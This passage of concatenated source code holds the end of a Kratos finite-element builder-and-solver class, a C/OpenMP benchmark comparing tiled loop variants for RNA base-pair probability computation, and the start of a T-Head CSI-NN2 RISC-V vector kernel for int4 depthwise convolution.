if(EquationId.size() != geom.size()) EquationId.resize(geom.size(),false);
for(unsigned int i=0; i<geom.size(); i++)
{
EquationId[i] = geom[i].GetDof(rVar,pos).EquationId();
}
#ifdef USE_LOCKS_IN_ASSEMBLY
this->Assemble(A,b,LHS_Contribution,RHS_Contribution,EquationId,lock_array);
#else
this->Assemble(A,b,LHS_Contribution,RHS_Contribution,EquationId);
#endif
}
}
if (this->GetEchoLevel()>0) {
std::cout << "parallel building time: " << timer.ElapsedSeconds() << std::endl;
}
#ifdef _OPENMP
for(int i = 0; i<A_size; i++)
omp_destroy_lock(&lock_array[i]);
#endif
KRATOS_CATCH("")
}
//**************************************************************************
//**************************************************************************
void SetUpDofSet(
typename TSchemeType::Pointer pScheme,
ModelPart& r_model_part
) override
{
KRATOS_TRY
//fills a list of "active" nodes defined as nodes which have neighbours
// AND no fixed pressure
mActiveNodes.clear();
mActiveNodes.reserve(r_model_part.Nodes().size() );
for (typename NodesArrayType::iterator it=r_model_part.NodesBegin(); it!=r_model_part.NodesEnd(); ++it)
{
if( (it->GetValue(NEIGHBOUR_NODES)).size() != 0 )
{
mActiveNodes.push_back(*(it.base() ));
}
}
//fills the DofList and gives a unique progressive tag to each node
BaseType::mDofSet.clear();
BaseType::mDofSet.reserve(mActiveNodes.size() );
for(GlobalPointersVector< Node<3> >::iterator iii = mActiveNodes.begin(); iii!=mActiveNodes.end(); iii++)
{
BaseType::mDofSet.push_back( iii->pGetDof(rVar) );
}
//throws an exception if there are no degrees of freedom involved in the analysis
if (BaseType::mDofSet.size()==0)
KRATOS_THROW_ERROR(std::logic_error, "No degrees of freedom!", "");
BaseType::mDofSetIsInitialized = true;
// If reactions are to be calculated, we check if all the dofs have reactions defined
// This is to be done only in debug mode
#ifdef KRATOS_DEBUG
if(BaseType::GetCalculateReactionsFlag())
{
for(auto dof_iterator = BaseType::mDofSet.begin(); dof_iterator != BaseType::mDofSet.end(); ++dof_iterator)
{
KRATOS_ERROR_IF_NOT(dof_iterator->HasReaction()) << "Reaction variable not set for the following : " <<std::endl
<< "Node : "<<dof_iterator->Id()<< std::endl
<< "Dof : "<<(*dof_iterator)<<std::endl<<"Not possible to calculate reactions."<<std::endl;
}
}
#endif
KRATOS_CATCH("")
}
//**************************************************************************
//**************************************************************************
void ResizeAndInitializeVectors(
typename TSchemeType::Pointer pScheme,
TSystemMatrixPointerType& pA,
TSystemVectorPointerType& pDx,
TSystemVectorPointerType& pb,
ModelPart& rModelPart
) override
{
KRATOS_TRY
if(pA == NULL) //if the pointer is not initialized initialize it to an empty matrix
{
TSystemMatrixPointerType pNewA = TSystemMatrixPointerType(new TSystemMatrixType(0,0) );
pA.swap(pNewA);
}
if(pDx == NULL) //if the pointer is not initialized initialize it to an empty matrix
{
TSystemVectorPointerType pNewDx = TSystemVectorPointerType(new TSystemVectorType(0) );
pDx.swap(pNewDx);
}
if(pb == NULL) //if the pointer is not initialized initialize it to an empty matrix
{
TSystemVectorPointerType pNewb = TSystemVectorPointerType(new TSystemVectorType(0) );
pb.swap(pNewb);
}
if(BaseType::mpReactionsVector == NULL) //if the pointer is not initialized initialize it to an empty matrix
{
TSystemVectorPointerType pNewReactionsVector = TSystemVectorPointerType(new TSystemVectorType(0) );
BaseType::mpReactionsVector.swap(pNewReactionsVector);
}
TSystemMatrixType& A = *pA;
TSystemVectorType& Dx = *pDx;
TSystemVectorType& b = *pb;
//resizing the system vectors and matrix
if (A.size1() == 0 || BaseType::GetReshapeMatrixFlag() == true) //if the matrix is not initialized
{
A.resize(BaseType::mEquationSystemSize,BaseType::mEquationSystemSize,false);
#ifdef _OPENMP
ParallelConstructGraph(A);
#else
ConstructGraph(A);
#endif
}
else
{
if(A.size1() != BaseType::mEquationSystemSize || A.size2() != BaseType::mEquationSystemSize)
{
//KRATOS_WATCH("it should not come here!!!!!!!! ... this is SLOW");
KRATOS_ERROR <<"The equation system size has changed during the simulation. This is not permited."<<std::endl;
A.resize(BaseType::mEquationSystemSize,BaseType::mEquationSystemSize,true);
#ifdef _OPENMP
ParallelConstructGraph(A);
#else
ConstructGraph(A);
#endif
}
}
if (Dx.size() != BaseType::mEquationSystemSize) {
Dx.resize(BaseType::mEquationSystemSize, false);
}
TSparseSpace::SetToZero(Dx);
if (b.size() != BaseType::mEquationSystemSize) {
b.resize(BaseType::mEquationSystemSize, false);
}
TSparseSpace::SetToZero(b);
//if needed resize the vector for the calculation of reactions
if(BaseType::mCalculateReactionsFlag == true)
{
unsigned int ReactionsVectorSize = BaseType::mDofSet.size();
if(BaseType::mpReactionsVector->size() != ReactionsVectorSize)
BaseType::mpReactionsVector->resize(ReactionsVectorSize,false);
}
//swapping pointers
// pA.swap(pNewA);
// pDx.swap(pNewDx);
// pb.swap(pNewb);
#ifndef __SUNPRO_CC
KRATOS_CATCH("")
#endif
}
//**************************************************************************
//**************************************************************************
void Clear() override
{
this->mDofSet = DofsArrayType();
if(this->mpReactionsVector != NULL)
{
TSparseSpace::Clear( (this->mpReactionsVector) );
}
// *(this->mpReactionsVector) = TSystemVectorType();
if (this->GetEchoLevel()>1)
{
KRATOS_WATCH("ResidualBasedEliminationBuilderAndSolver Clear Function called");
}
}
/*@} */
/**@name Operations */
/*@{ */
/*@} */
/**@name Access */
/*@{ */
/*@} */
/**@name Inquiry */
/*@{ */
///@}
///@name Input and output
///@{
/// Turn back information as a string.
std::string Info() const override
{
return "ResidualBasedEliminationBuilderAndSolverComponentwise";
}
/// Print information about this object.
void PrintInfo(std::ostream& rOStream) const override
{
rOStream << Info();
}
/// Print object's data.
void PrintData(std::ostream& rOStream) const override
{
rOStream << Info();
}
/*@} */
/**@name Friends */
/*@{ */
/*@} */
protected:
/**@name Protected static Member Variables */
/*@{ */
/*@} */
/**@name Protected member Variables */
/*@{ */
/*@} */
/**@name Protected Operators*/
/*@{ */
//**************************************************************************
//**************************************************************************
//**************************************************************************
//**************************************************************************
void ConstructGraph(TSystemMatrixType& A)
{
KRATOS_TRY
std::vector< std::vector<int> > index_list(BaseType::mEquationSystemSize);
int total_size = 0;
unsigned int pos = (mActiveNodes.begin())->GetDofPosition(rVar);
//constructing the system matrix row by row
int index_i;
for(GlobalPointersVector< Node<3> >::iterator in = mActiveNodes.begin();
in!=mActiveNodes.end(); in++)
{
const Node<3>::DofType& current_dof = in->GetDof(rVar,pos);
if( current_dof.IsFixed() == false)
{
index_i = (current_dof).EquationId();
GlobalPointersVector< Node<3> >& neighb_nodes = in->GetValue(NEIGHBOUR_NODES);
std::vector<int>& indices = index_list[index_i];
indices.reserve(neighb_nodes.size()+1);
//filling the first neighbours list
indices.push_back(index_i);
for( GlobalPointersVector< Node<3> >::iterator i = neighb_nodes.begin();
i != neighb_nodes.end(); i++)
{
const Node<3>::DofType& neighb_dof = i->GetDof(rVar,pos);
if(neighb_dof.IsFixed() == false )
{
int index_j = (neighb_dof).EquationId();
indices.push_back(index_j);
}
}
//sorting the indices and eliminating the duplicates
std::sort(indices.begin(),indices.end());
typename std::vector<int>::iterator new_end = std::unique(indices.begin(),indices.end());
indices.erase(new_end,indices.end());
total_size += indices.size();
}
}
A.reserve(total_size,false);
//filling the matrix graph with zero entries (the diagonal included)
for(unsigned int i=0; i<BaseType::mEquationSystemSize; i++)
{
std::vector<int>& indices = index_list[i];
for(unsigned int j=0; j<indices.size(); j++)
{
A.push_back(i,indices[j] , 0.00);
}
}
KRATOS_CATCH("")
}
//**************************************************************************
//**************************************************************************
//**************************************************************************
//**************************************************************************
#ifdef _OPENMP
void ParallelConstructGraph(TSystemMatrixType& A)
{
#ifndef __SUNPRO_CC
KRATOS_TRY
#endif
std::vector< std::vector<int> > index_list(BaseType::mEquationSystemSize);
int number_of_threads = omp_get_max_threads();
unsigned int pos = (mActiveNodes.begin())->GetDofPosition(rVar);
//constructing the system matrix row by row
DenseVector<unsigned int> partition;
DenseVector<unsigned int> local_sizes(number_of_threads);
for(int i=0; i<number_of_threads; i++)
local_sizes[i] = 0;
CreatePartition(number_of_threads, mActiveNodes.size(), partition);
#pragma omp parallel for firstprivate(number_of_threads,pos) schedule(static,1)
for(int k=0; k<number_of_threads; k++)
{
GlobalPointersVector< Node<3> >::iterator it_begin = mActiveNodes.begin()+partition[k];
GlobalPointersVector< Node<3> >::iterator it_end = mActiveNodes.begin()+partition[k+1];
for(GlobalPointersVector< Node<3> >::iterator in = it_begin;
in!=it_end; in++)
{
const Node<3>::DofType& current_dof = in->GetDof(rVar,pos);
if( current_dof.IsFixed() == false)
{
int index_i = (current_dof).EquationId();
GlobalPointersVector< Node<3> >& neighb_nodes = in->GetValue(NEIGHBOUR_NODES);
std::vector<int>& indices = index_list[index_i];
indices.reserve(neighb_nodes.size()+1);
//filling the first neighbours list
indices.push_back(index_i);
for( GlobalPointersVector< Node<3> >::iterator i = neighb_nodes.begin();
i != neighb_nodes.end(); i++)
{
const Node<3>::DofType& neighb_dof = i->GetDof(rVar,pos);
if(neighb_dof.IsFixed() == false )
{
int index_j = (neighb_dof).EquationId();
indices.push_back(index_j);
}
}
//sorting the indices and eliminating the duplicates
std::sort(indices.begin(),indices.end());
typename std::vector<int>::iterator new_end = std::unique(indices.begin(),indices.end());
indices.erase(new_end,indices.end());
local_sizes[k] += indices.size();
}
}
}
//calculate the total size of the system
int total_size = 0;
for(int i=0; i<number_of_threads; i++)
total_size += local_sizes[i];
A.reserve(total_size,false);
//filling the matrix graph with zero entries (the diagonal included)
for(unsigned int i=0; i<BaseType::mEquationSystemSize; i++)
{
std::vector<int>& indices = index_list[i];
for(unsigned int j=0; j<indices.size(); j++)
{
A.push_back(i,indices[j] , 0.00);
}
}
#ifndef __SUNPRO_CC
KRATOS_CATCH("")
#endif
}
#endif
/*@} */
/**@name Protected Operations*/
/*@{ */
/*@} */
/**@name Protected Access */
/*@{ */
/*@} */
/**@name Protected Inquiry */
/*@{ */
/*@} */
/**@name Protected LifeCycle */
/*@{ */
/*@} */
private:
/**@name Static Member Variables */
/*@{ */
/*@} */
/**@name Member Variables */
/*@{ */
TVariableType const & rVar;
GlobalPointersVector<Node<3> > mActiveNodes;
/*@} */
/**@name Private Operators*/
/*@{ */
//******************************************************************************************
//******************************************************************************************
inline void CreatePartition(unsigned int number_of_threads,const int number_of_rows, DenseVector<unsigned int>& partitions)
{
partitions.resize(number_of_threads+1);
int partition_size = number_of_rows / number_of_threads;
partitions[0] = 0;
partitions[number_of_threads] = number_of_rows;
for(unsigned int i = 1; i<number_of_threads; i++)
partitions[i] = partitions[i-1] + partition_size ;
}
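//Example (for illustration): number_of_rows = 10 and number_of_threads = 3
//give partition_size = 3 and partitions = [0, 3, 6, 10], so thread k handles
//the half-open row range [partitions[k], partitions[k+1]).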
/*@} */
/**@name Private Operations*/
/*@{ */
/*@} */
/**@name Private Access */
/*@{ */
/*@} */
/**@name Private Inquiry */
/*@{ */
/*@} */
/**@name Un accessible methods */
/*@{ */
/*@} */
}; /* Class ResidualBasedEliminationBuilderAndSolverComponentwise */
/*@} */
/**@name Type Definitions */
/*@{ */
/*@} */
} /* namespace Kratos.*/
#endif /* KRATOS_RESIDUAL_BASED_ELIMINATION_BUILDER_AND_SOLVERCOMPONENTWISE defined */
|
mea_pb2_traco.c | #include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <omp.h>
#include <math.h>
#include <time.h> // for time(), used to seed srand()
#define min(a,b) (((a)<(b))?(a):(b))
#define MIN(a,b) (((a)<(b))?(a):(b))
#define max(a,b) (((a)>(b))?(a):(b))
#define MAX(a,b) (((a)>(b))?(a):(b))
#define floord(n,d) floor(((double)(n))/((double)(d)))
#define ceild(n,d) ceil(((double)(n))/((double)(d)))
double ** Q;
double ** Qbp;
double ** Pbp;
double ** Pu;
double ** M;
int Ebp = 0; // Energy weight of base pair -2, -1, 0, 1, 2
int RT = 1; // 'Normalized' temperature 1,2,3,4,5
float ERT;
int l = 0; //minimum loop length 0-5
int delta = 1; // Base pair weighting 1-5
char * RNA; //only ACGU
int N;
int DIM;
#include "../mem.h"
int paired(int i, int j) {
char nt1 = RNA[i];
char nt2 = RNA[j];
if ((nt1 == 'A' && nt2 == 'U') || (nt1 == 'U' && nt2 == 'A') ||
(nt1 == 'G' && nt2 == 'C') || (nt1 == 'C' && nt2 == 'G') ||
(nt1 == 'G' && nt2 == 'U') || (nt1 == 'U' && nt2 == 'G')){
return 1;}
else
return 0;
}
int main(int argc, char *argv[]){
int num_proc=1;
int i,j,k,ll,p,q;
int c0, c1,c2,c3,c4,c5,c6,c7,c8,c9,c10,c11,c12,c13,c15;
int t1, t2, t3, t4, t5, t6,t7;
int lb, ub, lbp, ubp, lb2, ub2;
register int lbv, ubv;
ERT = exp((float)-Ebp/(float)RT);
srand(time(NULL));
if(argc > 1)
num_proc = atoi(argv[1]);
int kind=1;
N = 8;
DIM = 12;
if(argc > 2)
N = atoi(argv[2]);
DIM = N+10;
if(argc > 3)
kind = atoi(argv[3]);
omp_set_num_threads(num_proc);
//printf(" -exp(Ebp/RT) = %5.3f\n", ERT);
RNA = (char*) malloc(DIM * sizeof(char)); //read from FASTA file
rand_seq(RNA, N);
//printf("Sequence: ");
//for(i=0; i<N; i++)
// printf("%c", RNA[i]);
//printf("\n\n");
Q = memd();
Qbp = memd();
Pbp = memd();
Pu = memd();
M = memd();
rna_array_init(Q, 1, 1);
rna_array_init(Qbp, 0, 0);
rna_array_init(Pbp, 0, 0);
rna_array_init(Pu, 0, 0);
rna_array_init(M, 0, 0);
double start = omp_get_wtime();
// compute the base-pair probabilities Pbp (the partition functions Q and Qbp enter as inputs)
if(kind==1){
#pragma scop
for(i=0; i<N; i++){
for(j=i+1; j<N; j++){
for(p=0; p<i; p++){
for(q=j+1; q<N; q++){
Pbp[i][j] += (Pbp[p][q] * ERT * Q[p+1][i] * Qbp[i][j] * Q[j+1][q-1]) / (Qbp[p][q] ==0 ? 1 : Qbp[p][q]);
}
}
Pbp[i][j] += (Q[0][i]*Q[j][N-1]*Qbp[i][j])/Q[0][N-1];
}
}
#pragma endscop
}
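// The kind==2 (Pluto) and kind==3 (TRACO) variants below are loop-tiled,
// OpenMP-parallel versions of the reference scop above; they are intended
// to compute the same Pbp recurrence, only with a different iteration order.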
if(kind==2) // pluto
{
printf("pluto\n");
/* Start of CLooG code */
if(1==0)
if (N >= 2) {
for (t1=0;t1<=N-2;t1++) {
lbp=t1+1;
ubp=N-1;
#pragma omp parallel for private(lbv,ubv,t3,t4,t5,t6)
for (t2=lbp;t2<=ubp;t2++) {
if (t2 <= N-2) {
for (t3=0;t3<=floord(t1-1,16);t3++) {
for (t5=16*t3;t5<=min(t1-1,16*t3+15);t5++) {
for (t6=t2+1;t6<=N-1;t6++) {
Pbp[t1][t2] += (Pbp[t5][t6] * ERT * Q[t5+1][t1] * Qbp[t1][t2] * Q[t2+1][t6-1]) / (Qbp[t5][t6] ==0 ? 1 : Qbp[t5][t6]);;
}
}
}
}
t3 = floord(t1,16);
Pbp[t1][t2] += (Q[0][t1]*Q[t2][N-1]*Qbp[t1][t2])/Q[0][N-1];;
}
}
}
/* Start of CLooG code */
if(1==1)
if (N >= 2) {
for (t1=0;t1<=N-2;t1++) {
lbp=ceild(t1-14,16);
ubp=floord(N-1,16);
#pragma omp parallel for private(lbv,ubv,t3,t4,t5,t6)
for (t2=lbp;t2<=ubp;t2++) {
for (t3=0;t3<=floord(t1,16);t3++) {
if ((t1 >= 16*t3+1) && (t1 <= 16*t3+15)) {
for (t4=max(16*t2,t1+1);t4<=min(N-2,16*t2+15);t4++) {
for (t5=16*t3;t5<=t1-1;t5++) {
for (t6=t4+1;t6<=N-1;t6++) {
Pbp[t1][t4] += (Pbp[t5][t6] * ERT * Q[t5+1][t1] * Qbp[t1][t4] * Q[t4+1][t6-1]) / (Qbp[t5][t6] ==0 ? 1 : Qbp[t5][t6]);;
}
}
Pbp[t1][t4] += (Q[0][t1]*Q[t4][N-1]*Qbp[t1][t4])/Q[0][N-1];;
}
}
if (t1 >= 16*t3+16) {
for (t4=max(16*t2,t1+1);t4<=min(N-2,16*t2+15);t4++) {
for (t5=16*t3;t5<=16*t3+15;t5++) {
for (t6=t4+1;t6<=N-1;t6++) {
Pbp[t1][t4] += (Pbp[t5][t6] * ERT * Q[t5+1][t1] * Qbp[t1][t4] * Q[t4+1][t6-1]) / (Qbp[t5][t6] ==0 ? 1 : Qbp[t5][t6]);;
}
}
}
}
if ((t1 >= 16*t3+1) && (t1 <= 16*t3+15) && (t2 >= ceild(N-16,16))) {
Pbp[t1][(N-1)] += (Q[0][t1]*Q[(N-1)][N-1]*Qbp[t1][(N-1)])/Q[0][N-1];;
}
if (t1 == 16*t3) {
for (t4=max(16*t2,t1+1);t4<=min(N-1,16*t2+15);t4++) {
if (t1%16 == 0) {
Pbp[t1][t4] += (Q[0][t1]*Q[t4][N-1]*Qbp[t1][t4])/Q[0][N-1];;
}
}
}
}
}
}
}
/*End of CLooG code */
}
if(kind==3) // traco
{
printf("traco\n");
/* for( c1 = 0; c1 < N - 1; c1 += 1)
#pragma omp parallel for schedule(dynamic , 1)
for( c3 = 0; c3 <= (N - c1 - 2) / 16; c3 += 1)
for( c4 = max(max(0, -c1 + 1), -N + c1 + 16 * c3 + 3); c4 <= 1; c4 += 1) {
if (c4 == 1) {
for( c11 = c1 + 16 * c3 + 1; c11 <= min(N - 1, c1 + 16 * c3 + 16); c11 += 1)
Pbp[c1][c11] += (Q[0][c1]*Q[c11][N-1]*Qbp[c1][c11])/Q[0][N-1];
} else {
for( c5 = 0; c5 <= (c1 - 1) / 16; c5 += 1)
for( c7 = 0; c7 <= -c3 + (N - c1 - 3) / 16; c7 += 1)
for( c11 = c1 + 16 * c3 + 1; c11 <= min(c1 + 16 * c3 + 16, N - 16 * c7 - 2); c11 += 1) {
if (N >= 16 * c7 + c11 + 18) {
for( c15 = 16 * c7 + c11 + 1; c15 <= 16 * c7 + c11 + 16; c15 += 1)
Pbp[c1][c11] += (Pbp[16*c5][c15] * ERT * Q[16*c5+1][c1] * Qbp[c1][c11] * Q[c11+1][c15-1]) / (Qbp[16*c5][c15] ==0 ? 1 : Qbp[16*c5][c15]);
} else {
for( c13 = 16 * c5; c13 <= min(c1 - 1, 16 * c5 + 15); c13 += 1) {
if (c13 >= 16 * c5 + 1)
for( c15 = c11 + 1; c15 <= 16 * c7 + c11; c15 += 1)
Pbp[c1][c11] += (Pbp[c13][c15] * ERT * Q[c13+1][c1] * Qbp[c1][c11] * Q[c11+1][c15-1]) / (Qbp[c13][c15] ==0 ? 1 : Qbp[c13][c15]);
for( c15 = 16 * c7 + c11 + 1; c15 < N; c15 += 1)
Pbp[c1][c11] += (Pbp[c13][c15] * ERT * Q[c13+1][c1] * Qbp[c1][c11] * Q[c11+1][c15-1]) / (Qbp[c13][c15] ==0 ? 1 : Qbp[c13][c15]);
}
}
}
}
}
*/
for( c1 = 0; c1 < N - 1; c1 += 1)
#pragma omp parallel for schedule(dynamic , 1)
for( c3 = 0; c3 < N - c1 - 1; c3 += 1)
for( c4 = max(max(0, -c1 + 1), -N + c1 + c3 + 3); c4 <= 1; c4 += 1) {
if (c4 == 1) {
Pbp[c1][(c1+c3+1)] += (Q[0][c1]*Q[(c1+c3+1)][N-1]*Qbp[c1][(c1+c3+1)])/Q[0][N-1];
} else {
for( c5 = 0; c5 <= (c1 - 1) / 128; c5 += 1)
for( c7 = 0; c7 <= (N - c1 - c3 - 3) / 16; c7 += 1) {
if (N >= c1 + c3 + 16 * c7 + 19) {
for( c15 = c1 + c3 + 16 * c7 + 2; c15 <= c1 + c3 + 16 * c7 + 17; c15 += 1)
Pbp[c1][(c1+c3+1)] += (Pbp[128*c5][c15] * ERT * Q[128*c5+1][c1] * Qbp[c1][(c1+c3+1)] * Q[(c1+c3+1)+1][c15-1]) / (Qbp[128*c5][c15] ==0 ? 1 : Qbp[128*c5][c15]);
} else {
for( c13 = 128 * c5; c13 <= min(c1 - 1, 128 * c5 + 127); c13 += 1) {
if (c13 >= 128 * c5 + 1)
for( c15 = c1 + c3 + 2; c15 <= c1 + c3 + 16 * c7 + 1; c15 += 1)
Pbp[c1][(c1+c3+1)] += (Pbp[c13][c15] * ERT * Q[c13+1][c1] * Qbp[c1][(c1+c3+1)] * Q[(c1+c3+1)+1][c15-1]) / (Qbp[c13][c15] ==0 ? 1 : Qbp[c13][c15]);
for( c15 = c1 + c3 + 16 * c7 + 2; c15 < N; c15 += 1)
Pbp[c1][(c1+c3+1)] += (Pbp[c13][c15] * ERT * Q[c13+1][c1] * Qbp[c1][(c1+c3+1)] * Q[(c1+c3+1)+1][c15-1]) / (Qbp[c13][c15] ==0 ? 1 : Qbp[c13][c15]);
}
}
}
}
}
}
if(kind==4) // traco tstile
{
}
double stop = omp_get_wtime();
printf("%.4f\n",stop - start);
//printf("Q\n");
//rna_array_print(Q);
//printf("Qbp\n");
//rna_array_print(Qbp);
exit(0); // note: everything below this early exit is unreachable
printf("Pbp\n");
rna_array_print(Pbp);
#pragma scop
for(i=N-1; i>=0; i--){
for(j=i+1; j<N; j++){
Pu[i][j] = (Q[0][i]*Q[j][N-1]*1)/Q[0][N-1];
for(p=0; p<i; p++){
for(q=j+1; q<N; q++){
Pu[i][j] += (Pbp[p][q] * ERT * Q[p+1][i] * 1 * Q[j+1][q-1]) / (Qbp[p][q] ==0 ? 1 : Qbp[p][q]) ;
}
}
}
}
#pragma endscop
printf("Pu\n");
rna_array_print(Pu);
double * Puu = (double*)malloc(DIM * sizeof(double));
#pragma scop
for(i=0; i<=N; i++){
Puu[i] = 1;
for(j=i+1; j<N; j++){
Puu[i] += -1 * Pbp[i][j+1];
}
for(k=0; k<i; k++){
Puu[i] += -1 * Pbp[k][i+1];
}
}
#pragma endscop
printf("Puu\n");
for(i=0; i<N-1; i++)
printf("%3.3f ", Puu[i]);
printf("\n");
#pragma scop
for(i=N-1; i>=0; i--){
for(j=i+1; j<N; j++){
for(k=0; k<j-i-l; k++){
M[i][j] = MAX(M[i][j], M[i][k+i-1] + M[k+i+1][j-1] + delta*Pbp[k+i][j])*paired(k+i,j-1);
}
M[i][j] = MAX(M[i][j], M[i][j-1] + Puu[j-1]);
}
}
#pragma endscop
printf("M\n");
rna_array_print(M);
return 0;
}
|
depthwise_convolution_3x3_int4.c | /*
* Copyright (C) 2016-2022 T-Head Semiconductor Co., Ltd. All rights reserved.
*
* SPDX-License-Identifier: Apache-2.0
*
* Licensed under the Apache License, Version 2.0 (the License); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an AS IS BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/* CSI-NN2 version 1.12.x */
#include "csi_thead_rvv.h"
static vint8m1_t requantize_m4(vint32m4_t _src, int32_t multiplier, int32_t shift, int32_t out_zp,
int vl)
{
vint32m4_t _mulh = vmulh_vx_i32m4(_src, multiplier, vl);
_mulh = vssra_vx_i32m4(_mulh, -shift - 1, vl);
_mulh = vadd_vx_i32m4(_mulh, out_zp, vl);
vint16m2_t _tmp1 = vnclip_wx_i16m2(_mulh, 0, vl);
vint8m1_t _tmp2 = vnclip_wx_i8m1(_tmp1, 0, vl);
return _tmp2;
}
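/* A scalar sketch of requantize_m4 above, added for illustration only; it is
 * not part of the CSI-NN2 API. Assumptions: vmulh keeps the high 32 bits of
 * the signed 32x32 product, vssra rounds to nearest-up (the default vxrm)
 * before the arithmetic right shift, and the two vnclip steps jointly
 * saturate the 32-bit value down to the int8 range. */
static inline int8_t requantize_scalar_sketch(int32_t src, int32_t multiplier,
                                              int32_t shift, int32_t out_zp)
{
    int64_t mulh = ((int64_t)src * multiplier) >> 32; /* like vmulh_vx_i32m4 */
    int32_t rsh = -shift - 1;                         /* same amount as vssra */
    int64_t v = (rsh > 0) ? ((mulh + (1LL << (rsh - 1))) >> rsh) : mulh;
    v += out_zp;                                      /* like vadd_vx_i32m4 */
    if (v > 127) v = 127;                             /* vnclip 32->16->8 saturation */
    if (v < -128) v = -128;
    return (int8_t)v;
}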
int csi_nn_rvv_dwconv3x3s1_int4(struct csi_tensor *input, struct csi_tensor *output,
struct csi_tensor *kernel, struct csi_tensor *bias,
struct conv2d_params *params)
{
int8_t *input_data = (int8_t *)input->data;
int8_t *output_data = (int8_t *)output->data;
int8_t *kernel_data = (int8_t *)kernel->data;
int32_t *bias_data = (int32_t *)bias->data;
int32_t batch = input->dim[0];
int32_t in_h = input->dim[1];
int32_t in_w = input->dim[2];
int32_t in_c = input->dim[3]; // group = in_channel
int32_t out_h = output->dim[1];
int32_t out_w = output->dim[2];
int32_t out_c = output->dim[3];
int8_t *input_padd_buf = (int8_t *)csi_mem_alloc((in_h + params->pad_top + params->pad_down) *
(in_w + params->pad_left + params->pad_right) *
in_c * sizeof(int8_t));
int8_t pad_value = input->qinfo->zero_point;
csi_nn_rvv_pad_input_int4_trans_int8(
input_data, input_padd_buf, in_c, in_h, in_w, in_h + params->pad_top + params->pad_down,
in_w + params->pad_left + params->pad_right, params->pad_top, params->pad_left,
input->qinfo->zero_point);
int8_t *kernel_tran_buf = (int8_t *)csi_mem_alloc(9 * in_c * sizeof(int8_t));
int8_t *output_tran_buf = (int8_t *)csi_mem_alloc(out_h * out_w * out_c * sizeof(int8_t));
csi_nn_rvv_int4_trans_int8(kernel_data, kernel_tran_buf, 9 * in_c);
in_h = in_h + params->pad_top + params->pad_down;
in_w = in_w + params->pad_left + params->pad_right;
#pragma omp parallel for num_threads(1)
for (int c = 0; c < in_c; c++) {
int8_t *outptr0 = output_tran_buf + c;
int8_t *outptr1 = outptr0 + out_w * out_c;
// please use the fuse_zp2bias option in hhb, so that bias_data won't be NULL
int32_t bias0 = bias_data[c];
int8_t *img0 = input_padd_buf + c;
int8_t *r0 = img0;
int8_t *r1 = r0 + in_w * in_c;
int8_t *r2 = r1 + in_w * in_c;
int8_t *r3 = r2 + in_w * in_c;
const int8_t *kernel0 = kernel_tran_buf + c;
int8_t k00 = kernel0[0];
int8_t k01 = kernel0[1 * in_c];
int8_t k02 = kernel0[2 * in_c];
int8_t k10 = kernel0[3 * in_c];
int8_t k11 = kernel0[4 * in_c];
int8_t k12 = kernel0[5 * in_c];
int8_t k20 = kernel0[6 * in_c];
int8_t k21 = kernel0[7 * in_c];
int8_t k22 = kernel0[8 * in_c];
int vl;
int h = 0;
// h2 loop
for (; h + 1 < out_h; h += 2) {
int w = out_w;
// h2w8 loop
while (w > 0) {
vl = vsetvl_e32m4(w);
vint32m4_t _acc0 = vmv_v_x_i32m4(bias0, vl);
vint32m4_t _acc1 = vmv_v_x_i32m4(bias0, vl);
vint8m1_t _r0_0_7 = vlse8_v_i8m1(r0, in_c * sizeof(int8_t), vl);
vint8m1_t _r0_1_8 = vlse8_v_i8m1(r0 + 1 * in_c, in_c * sizeof(int8_t), vl);
vint8m1_t _r0_2_9 = vlse8_v_i8m1(r0 + 2 * in_c, in_c * sizeof(int8_t), vl);
vint8m1_t _r1_0_7 = vlse8_v_i8m1(r1, in_c * sizeof(int8_t), vl);
vint8m1_t _r1_1_8 = vlse8_v_i8m1(r1 + 1 * in_c, in_c * sizeof(int8_t), vl);
vint8m1_t _r1_2_9 = vlse8_v_i8m1(r1 + 2 * in_c, in_c * sizeof(int8_t), vl);
vint8m1_t _r2_0_7 = vlse8_v_i8m1(r2, in_c * sizeof(int8_t), vl);
vint8m1_t _r2_1_8 = vlse8_v_i8m1(r2 + 1 * in_c, in_c * sizeof(int8_t), vl);
vint8m1_t _r2_2_9 = vlse8_v_i8m1(r2 + 2 * in_c, in_c * sizeof(int8_t), vl);
vint8m1_t _r3_0_7 = vlse8_v_i8m1(r3, in_c * sizeof(int8_t), vl);
vint8m1_t _r3_1_8 = vlse8_v_i8m1(r3 + 1 * in_c, in_c * sizeof(int8_t), vl);
vint8m1_t _r3_2_9 = vlse8_v_i8m1(r3 + 2 * in_c, in_c * sizeof(int8_t), vl);
vint16m2_t _r0_0_7_w = vwadd_vx_i16m2(_r0_0_7, 0, vl); // widen 8 -> 16
vint16m2_t _r0_1_8_w = vwadd_vx_i16m2(_r0_1_8, 0, vl);
vint16m2_t _r0_2_9_w = vwadd_vx_i16m2(_r0_2_9, 0, vl);
vint16m2_t _r1_0_7_w = vwadd_vx_i16m2(_r1_0_7, 0, vl);
vint16m2_t _r1_1_8_w = vwadd_vx_i16m2(_r1_1_8, 0, vl);
vint16m2_t _r1_2_9_w = vwadd_vx_i16m2(_r1_2_9, 0, vl);
vint16m2_t _r2_0_7_w = vwadd_vx_i16m2(_r2_0_7, 0, vl);
vint16m2_t _r2_1_8_w = vwadd_vx_i16m2(_r2_1_8, 0, vl);
vint16m2_t _r2_2_9_w = vwadd_vx_i16m2(_r2_2_9, 0, vl);
vint16m2_t _r3_0_7_w = vwadd_vx_i16m2(_r3_0_7, 0, vl);
vint16m2_t _r3_1_8_w = vwadd_vx_i16m2(_r3_1_8, 0, vl);
vint16m2_t _r3_2_9_w = vwadd_vx_i16m2(_r3_2_9, 0, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k00, _r0_0_7_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k01, _r0_1_8_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k02, _r0_2_9_w, vl);
_acc1 = vwmacc_vx_i32m4(_acc1, k00, _r1_0_7_w, vl);
_acc1 = vwmacc_vx_i32m4(_acc1, k01, _r1_1_8_w, vl);
_acc1 = vwmacc_vx_i32m4(_acc1, k02, _r1_2_9_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k10, _r1_0_7_w, vl);
